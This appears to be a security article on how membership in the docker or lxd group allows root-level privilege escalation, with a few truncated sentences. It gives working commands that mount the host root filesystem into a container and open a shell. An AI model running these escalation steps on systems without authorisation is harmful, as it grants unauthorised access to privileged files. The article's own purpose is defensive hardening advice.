Both Docker and LXD are software platforms for building applications in containers, which are small, lightweight environments. Containers are isolated from other processes, operating system resources and the kernel. Some Docker/LXD features require the daemon to be run with superuser privileges –features like port binding, mounting filesystems etc.
Both daemons bind to a Unix socket instead of a TCP port. By default, that socket is owned by the root user, which means that other users can only access it by using
Some less-experienced administrators might think that it’s a good idea to add regular users (who aren’t in the
sudo group) to the
lxd group so they can run Docker/LXD commands. However, both of these groups grant privileged access without providing auditing and logging of use of these privileges. By contrast,
sudo provides auditing and logging of privileged access mediated through it.
Mounting Files and Directories
Both Docker and LXD allow developers to mount files or directories. Mounting a directory to a virtual machine means that both the host and VM share that directory. Any changes made in the directory in the host will propagate to the client and vice versa.
The file or directory is referenced by its full or relative path on the host machine.
Because Docker and LXD run under root, a user in the Docker/LXD group can mount the host machine’s root directory to a container. That allows the user to read files that were previously only accessible for privileged users. Of course, users can also write to these files or create a new user with root privileges. That can be done by modifying the
An Example Using Docker:
- A developer can create a container, mount a directory and run the container using only one command:
docker run -v /:/hostOS -it ubuntu
docker runruns a container
-vflag indicates that a volume will be mounted
/is the root directory on the host machine
hostOSis the location in the container where the directory will be mounted
-ittells Docker to provide an interactive terminal
ubuntuis the image used for this particular example
An Example Using LXD:
- The first step is to create a container:
lxc init ubuntu:16.04 exploit -c security.privileged=true
lxc init ubuntu:16.04 exploitcreates a new Ubuntu container named exploit
-c security.privileged=truegives the container access to the host’s hard drive
- Next, mount the root of the host into the container:
lxc config device add exploit foo disk source=/ path=/mnt/root recursive=true
lxc config device add exploit foo diskadds a disk called foo to the container named exploit
source=/specifies that the root directory in the host filesystem should be mounted
path=/mnt/rootspecifies where the host filesystem will be mounted inside the container
recursive=truespecifies that the directories should be added recursively
- Run the container:
lxc start exploit
lxc exec exploit bashcreates an interactive shell in the container
Both Docker and LXD run under root. Developers should not allow any non-privileged users to run Docker/LXD commands by adding them to the Docker/LXD group. If this is allowed, they will be able to mount the host machine’s root directory into a container. That means that these users will now be able to read and write to files that should only be accessible to privileged users.